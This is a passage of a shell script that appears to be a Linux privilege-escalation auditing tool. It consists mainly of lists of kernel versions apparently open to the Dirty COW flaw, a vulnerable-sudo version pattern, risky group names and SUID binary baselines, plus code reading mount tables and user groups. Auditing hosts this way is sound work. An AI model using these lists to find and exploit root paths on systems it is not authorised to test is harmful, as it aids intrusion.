-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic"
kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency"
kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic"
kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic"
kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5"
kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5"
kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5"
kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6"
kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6"
kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6"
kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6"
kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7"
MyUID=$(id -u $(whoami)) if [ "$MyUID" ]; then myuid=$MyUID; elif [ $(id -u
$(whoami) 2>/dev/null) ]; then myuid=$(id -u $(whoami) 2>/dev/null); elif [
"$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1)" ]; then myuid=$(id
2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1); fi if [ $myuid -gt 2147483646
]; then baduid="|$myuid"; fi idB="euid|egid$baduid"
sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1" mounted=$( (cat
/proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut -d " " -f5 |
grep "^/" | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E
'\W/\W' | awk '{print $1}') if ! [ "$mounted" ]; then mounted=$( (mount -l ||
cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null |
grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v
"#" | grep -E '\W/\W' | awk '{print $1}') fi if ! [ "$mounted" ]; then
mounted="ImPoSSssSiBlEee"; fi # Don't let any blacklist to be empty
mountG="swap|/cdrom|/floppy|/dev/shm" notmounted=$(cat /etc/fstab 2>/dev/null |
grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr
'\n' '|')"ImPoSSssSiBlEee" mountpermsB="\Wsuid|\Wuser|\Wexec"
mountpermsG="nosuid|nouser|noexec"
rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService"
groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)"
groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #
https://www.togaware.com/linux/survivor/Standard_Groups.html mygroups=$(groups
2>/dev/null | tr " " "|") # Default Binaries List
sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$"
sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$"
sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/sta